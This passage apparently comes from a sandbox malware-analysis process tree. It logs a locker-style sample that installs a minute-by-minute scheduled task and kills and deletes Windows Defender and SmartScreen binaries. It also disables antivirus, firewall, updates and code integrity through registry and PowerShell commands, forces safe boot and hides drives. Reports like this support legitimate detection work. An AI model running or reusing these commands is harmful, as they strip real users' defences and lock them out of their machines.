  "schtasks" /create /tn "lockwin" /sc MINUTE /mo 1 /tr "C:\Users\Admin\AppData\Local\Temp\z4z25rle.3x1.exe" /rl LIMITED /f
  2⤵
  - Scheduled Task/Job: Scheduled Task
  PID:1016
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c taskkill /f /im SecurityHealthSystray.exe
  2⤵
  PID:2536
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im SecurityHealthSystray.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:3032
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c taskkill /f /im SecurityHealthService.exe
  2⤵
  PID:2560
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im SecurityHealthService.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2568
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c taskkill /f /im MsMpEng.exe
  2⤵
  PID:1604
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im MsMpEng.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2584
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c taskkill /f /im NisSrv.exe
  2⤵
  PID:1152
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im NisSrv.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1380
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c taskkill /f /im SmartScreen.exe
  2⤵
  PID:1984
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im SmartScreen.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1972
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c taskkill /f /im mrt.exe
  2⤵
  PID:1736
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im mrt.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:3044
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /im Explorer.exe /f
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3040
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /im Explorer.exe /f
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2404
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c del /f /q "C:\Windows\System32\MsMpEng.exe"
  2⤵
  PID:2964
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c del /f /q "C:\Windows\System32\NisSrv.exe"
  2⤵
  PID:2888
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c del /f /q "C:\Windows\System32\mrt.exe"
  2⤵
  PID:1960
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c del /f /q "C:\Windows\System32\smartscreen.exe"
  2⤵
  PID:972
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Set-MpPreference -DisableRealtimeMonitoring $true"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1752
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
  2⤵
  PID:1660
- - C:\Windows\system32\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
    3⤵
    - Modifies Windows Defender DisableAntiSpyware settings
    PID:968
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v SubmitSamplesConsent /t REG_DWORD /d 0 /f
  2⤵
  PID:772
- - C:\Windows\system32\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v SubmitSamplesConsent /t REG_DWORD /d 0 /f
    3⤵
    PID:1468
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Set-MpPreference -SubmitSamplesConsent 0"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2204
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v EnableControlledFolderAccess /t REG_DWORD /d 0 /f
  2⤵
  PID:2360
- - C:\Windows\system32\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v EnableControlledFolderAccess /t REG_DWORD /d 0 /f
    3⤵
    PID:264
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v SpynetReporting /t REG_DWORD /d 0 /f
  2⤵
  PID:2976
- - C:\Windows\system32\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v SpynetReporting /t REG_DWORD /d 0 /f
    3⤵
    PID:2132
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Set-MpPreference -EnableControlledFolderAccess Disabled"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1868
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Set-MpPreference -MAPSReporting Disabled"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2296
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableBehaviorMonitoring /t REG_DWORD /d 1 /f
  2⤵
  PID:552
- - C:\Windows\system32\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableBehaviorMonitoring /t REG_DWORD /d 1 /f
    3⤵
    - Modifies Windows Defender Real-time Protection settings
    PID:3028
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableRealtimeMonitoring /t REG_DWORD /d 1 /f
  2⤵
  PID:2312
- - C:\Windows\system32\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableRealtimeMonitoring /t REG_DWORD /d 1 /f
    3⤵
    - Modifies Windows Defender Real-time Protection settings
    PID:2648
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableOnAccessProtection /t REG_DWORD /d 1 /f
  2⤵
  PID:2344
- - C:\Windows\system32\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableOnAccessProtection /t REG_DWORD /d 1 /f
    3⤵
    - Modifies Windows Defender Real-time Protection settings
    PID:2784
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Set-MpPreference -DisableRealtimeMonitoring $true"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:940
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Set-MpPreference -DisableBehaviorMonitoring $true"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2444
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Set-MpPreference -DisableOnAccessProtection $true"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2180
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\ExploitGuard\Controlled Folder Access" /v EnableControlledFolderAccess /t REG_DWORD /d 0 /f
  2⤵
  PID:1268
- - C:\Windows\system32\reg.exe
    reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\ExploitGuard\Controlled Folder Access" /v EnableControlledFolderAccess /t REG_DWORD /d 0 /f
    3⤵
    PID:3016
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Set-MpPreference -EnableControlledFolderAccess Disabled"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1972
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard\Scenarios\KernelModeCodeIntegrity" /v Enabled /t REG_DWORD /d 0 /f
  2⤵
  PID:1420
- - C:\Windows\system32\reg.exe
    reg add "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard\Scenarios\KernelModeCodeIntegrity" /v Enabled /t REG_DWORD /d 0 /f
    3⤵
    PID:3008
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Set-ProcessMitigation -System -Disable KernelModeCodeIntegrity"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2220
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer" /v SmartScreenEnabled /t REG_SZ /d Off /f
  2⤵
  PID:1892
- - C:\Windows\system32\reg.exe
    reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer" /v SmartScreenEnabled /t REG_SZ /d Off /f
    3⤵
    PID:2960
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Set-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer' -Name 'SmartScreenEnabled' -Value 'Off'"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:408
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKLM\SOFTWARE\Policies\Microsoft\MicrosoftEdge\PhishingFilter" /v EnabledV9 /t REG_DWORD /d 0 /f
  2⤵
  PID:3052
- - C:\Windows\system32\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\MicrosoftEdge\PhishingFilter" /v EnabledV9 /t REG_DWORD /d 0 /f
    3⤵
    PID:876
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Set-ItemProperty -Path 'HKLM:\SOFTWARE\Policies\Microsoft\MicrosoftEdge\PhishingFilter' -Name 'EnabledV9' -Value 0"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:968
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile" /v EnableFirewall /t REG_DWORD /d 0 /f
  2⤵
  PID:2356
- - C:\Windows\system32\reg.exe
    reg add "HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile" /v EnableFirewall /t REG_DWORD /d 0 /f
    3⤵
    - Modifies firewall policy service
    PID:776
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Set-NetFirewallProfile -Profile Domain,Public,Private -Enabled False"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1640
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU" /v NoAutoUpdate /t REG_DWORD /d 1 /f
  2⤵
  PID:2288
- - C:\Windows\system32\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU" /v NoAutoUpdate /t REG_DWORD /d 1 /f
    3⤵
    PID:2324
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Set-ItemProperty -Path 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU' -Name 'NoAutoUpdate' -Value 1"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3060
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c bcdedit /set {current} safeboot minimal
  2⤵
  PID:2760
- - C:\Windows\system32\bcdedit.exe
    bcdedit /set {current} safeboot minimal
    3⤵
    - Modifies boot configuration data using bcdedit
    PID:1428
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoDrives /t REG_DWORD /d 67108863 /f > nul
  2⤵
  PID:2320
- - C:\Windows\system32\reg.exe
    reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoDrives /t REG_DWORD /d 67108863 /f
    3⤵
    - Modifies registry key
    PID:2636
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoViewOnDrive /t REG_DWORD /d 67108863 /f > nul
  2⤵
  PID:272
- - C:\Windows\system32\reg.exe
    reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoViewOnDrive /t REG_DWORD /d 67108863 /f
    3⤵
    - Modifies registry key
    PID:936
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\UX Configuration" /v Notification_Suppress /t REG_DWORD /d 1 /f
  2⤵
  PID:2588
- - C:\Windows\system32\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\UX Configuration" /v Notification_Suppress /t REG_DWORD /d 1 /f
    3⤵
    PID:2528
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Power" /v HiberbootEnabled /t REG_DWORD /d 0 /f
  2⤵
  PID:2788
- - C:\Windows\system32\reg.exe
    reg add "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Power" /v HiberbootEnabled /t REG_DWORD /d 0 /f
    3⤵
    PID:2556
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Set-ItemProperty -Path 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\UX Configuration' -Name 'Notification_Suppress' -Value 1"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1648
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKLM\SOFTWARE\Policies\Microsoft\WindowsFirewall\Policy" /v DisableNotifications /t REG_DWORD /d 1 /f
  2⤵
  PID:2868
- - C:\Windows\system32\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\WindowsFirewall\Policy" /v DisableNotifications /t REG_DWORD /d 1 /f
    3⤵
    PID:2856
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Set-ItemProperty -Path 'HKLM:\SOFTWARE\Policies\Microsoft\WindowsFirewall\Policy' -Name 'DisableNotifications' -Value 1"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2544
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c taskkill /f /im OneDrive.exe & %SystemRoot%\SysWOW64\OneDriveSetup.exe /uninstall
  2⤵
  PID:1904
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im OneDrive.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2852
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c schtasks /delete /tn "\Microsoft\Windows\OneDrive\OneDrive Reporting" /f
  2⤵
  - Indicator Removal: Clear Persistence
  PID:584
- - C:\Windows\system32\schtasks.exe
    schtasks /delete /tn "\Microsoft\Windows\OneDrive\OneDrive Reporting" /f
    3⤵
    PID:3024
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR" /v EnableControlledFolderAccess /t REG_DWORD /d 0 /f
  2⤵
  PID:344
- - C:\Windows\system32\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR" /v EnableControlledFolderAccess /t REG_DWORD /d 0 /f
    3⤵
    PID:2976
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR" /v EnableNetworkProtection /t REG_DWORD /d 0 /f
  2⤵
  PID:804
- - C:\Windows\system32\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR" /v EnableNetworkProtection /t REG_DWORD /d 0 /f
    3⤵
    PID:1868
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Set-MpPreference -EnableNetworkProtection Disabled"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2180
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Set-MpPreference -EnableControlledFolderAccess Disabled"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1752
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer" /v SmartScreenEnabled /t REG_SZ /d Off /f
  2⤵
  PID:2104
- - C:\Windows\system32\reg.exe
    reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer" /v SmartScreenEnabled /t REG_SZ /d Off /f
    3⤵
    PID:1896
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Set-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer' -Name 'SmartScreenEnabled' -Value 'Off'"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:956
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKLM\SOFTWARE\Policies\Microsoft\MicrosoftEdge\PhishingFilter" /v EnabledV9 /t REG_DWORD /d 0 /f
  2⤵
  PID:1108
- - C:\Windows\system32\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\MicrosoftEdge\PhishingFilter" /v EnabledV9 /t REG_DWORD /d 0 /f
    3⤵
    PID:2016
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Set-ItemProperty -Path 'HKLM:\SOFTWARE\Policies\Microsoft\MicrosoftEdge\PhishingFilter' -Name 'EnabledV9' -Value 0"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:892
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v PUAProtection /t REG_DWORD /d 0 /f
  2⤵
  PID:2408
- - C:\Windows\system32\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v PUAProtection /t REG_DWORD /d 0 /f
    3⤵
    PID:1080
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Set-MpPreference -PUAProtection Disabled"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:776
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c sc delete WinDefend
  2⤵
  PID:2224
- - C:\Windows\system32\sc.exe
    sc delete WinDefend
    3⤵
    - Launches sc.exe
    PID:2272
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Notifications\Settings" /v NOC_GLOBAL_SETTING_ALLOW_TOASTS_ABOVE_LOCK /t REG_DWORD /d 0 /f
  2⤵
  PID:1568
- - C:\Windows\system32\reg.exe
    reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Notifications\Settings" /v NOC_GLOBAL_SETTING_ALLOW_TOASTS_ABOVE_LOCK /t REG_DWORD /d 0 /f
    3⤵
    PID:1924
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Notifications\Settings" /v NOC_GLOBAL_SETTING_ALLOW_CRITICAL_TOASTS_ABOVE_LOCK /t REG_DWORD /d 0 /f
  2⤵
  PID:2236
- - C:\Windows\system32\reg.exe
    reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Notifications\Settings" /v NOC_GLOBAL_SETTING_ALLOW_CRITICAL_TOASTS_ABOVE_LOCK /t REG_DWORD /d 0 /f
    3⤵
    PID:2656
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Set-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Notifications\Settings' -Name 'NOC_GLOBAL_SETTING_ALLOW_TOASTS_ABOVE_LOCK' -Value 0"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1532
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Set-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Notifications\Settings' -Name 'NOC_GLOBAL_SETTING_ALLOW_CRITICAL_TOASTS_ABOVE_LOCK' -Value 0"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2184
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v Start_ShowControlPanel /t REG_DWORD /d 0 /f
  2⤵
  PID:1788
- - C:\Windows\system32\reg.exe
    reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v Start_ShowControlPanel /t REG_DWORD /d 0 /f
    3⤵
    PID:2320
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v Start_ShowMyComputer /t REG_DWORD /d 0 /f
  2⤵
  PID:1780
- - C:\Windows\system32\reg.exe
    reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v Start_ShowMyComputer /t REG_DWORD /d 0 /f
    3⤵
    PID:264
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v Start_ShowMyDocuments /t REG_DWORD /d 0 /f
  2⤵
  PID:1872
- - C:\Windows\system32\reg.exe
    reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v Start_ShowMyDocuments /t REG_DWORD /d 0 /f
    3⤵
    PID:868
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v Start_ShowMyMusic /t REG_DWORD /d 0 /f
  2⤵
  PID:1112
- - C:\Windows\system32\reg.exe
    reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v Start_ShowMyMusic /t REG_DWORD /d 0 /f
    3⤵
    PID:1160
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v Start_ShowMyPictures /t REG_DWORD /d 0 /f
  2⤵
  PID:1432
- - C:\Windows\system32\reg.exe
    reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v Start_ShowMyPictures /t REG_DWORD /d 0 /f
    3⤵
    PID:2844
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v Start_ShowRecentDocs /t REG_DWORD /d 0 /f
  2⤵
  PID:2628
- - C:\Windows\system32\reg.exe
    reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v Start_ShowRecentDocs /t REG_DWORD /d 0 /f
    3⤵
    PID:2860
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v Start_ShowRun /t REG_DWORD /d 0 /f
  2⤵
  PID:2652
- - C:\Windows\system32\reg.exe
    reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v Start_ShowRun /t REG_DWORD /d 0 /f
    3⤵
    PID:2560
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v Start_ShowSearch /t REG_DWORD /d 0 /f
  2⤵
  PID:2836
- - C:\Windows\system32\reg.exe
    reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v Start_ShowSearch /t REG_DWORD /d 0 /f
    3⤵
    PID:1988
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v Start_ShowUser /t REG_DWORD /d 0 /f
  2⤵
  PID:1952
- - C:\Windows\system32\reg.exe
    reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v Start_ShowUser /t REG_DWORD /d 0 /f
    3⤵
    PID:2296
- C:\Windows\System32\cmd.exe
